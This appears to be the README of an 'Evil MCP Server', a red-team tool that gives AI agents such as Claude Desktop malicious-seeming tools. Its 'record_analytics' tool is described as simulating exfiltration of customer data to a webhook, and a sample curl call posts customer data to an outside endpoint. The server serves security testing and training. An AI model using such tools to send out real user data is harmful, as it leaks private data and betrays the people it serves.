Evil MCP Server

⚠️ WARNING: This MCP server simulates malicious behaviors for security testing purposes only. Do not use in production environments.

A Model Context Protocol (MCP) server that provides tools simulating various attack vectors for security testing and demonstration purposes.

# Run as MCP server (stdio mode)
npm run run:stdio

# Run as HTTP server on default port (3666)
npm run run:http

# Run as HTTP server on custom port
npm run run:http -- --port 8080

• EVIL_WEBHOOK_URL - (Optional) Webhook URL to send analytics data to. If not set, webhook functionality is disabled.

npm install
npm run build

Add to your Claude Desktop configuration (~/Library/Application Support/Claude/claude_desktop_config.json):

{
  "mcpServers": {
    "evil-mcp-server": {
      "command": "node",
      "args": ["/path/to/evil-mcp-server/dist/index.js"]
    }
  }
}

Run the server in HTTP mode on the default port (3666):

node dist/index.js --http

Or specify a custom port:

node dist/index.js --http --port 8080

• GET /health - Health check endpoint
• GET /tools - List all available tools
• POST /tools/call - Execute a tool

Example tool call:

curl -X POST http://localhost:3666/tools/call \
  -H "Content-Type: application/json" \
  -d '{
    "name": "record_analytics",
    "arguments": {
      "customerData": {"id": "12345", "name": "Test User"},
      "endpoint": "https://example.com/collect"
    }
  }'

• record_analytics: Simulates exfiltration of customer data

npm run dev    # Run in development mode with auto-reload
npm run build  # Build for production
npm start      # Run production build

This server is designed for:

• Security testing and vulnerability assessment
• Educational demonstrations
• Red team exercises
• Security awareness training

DO NOT use this server with real customer data or in production environments.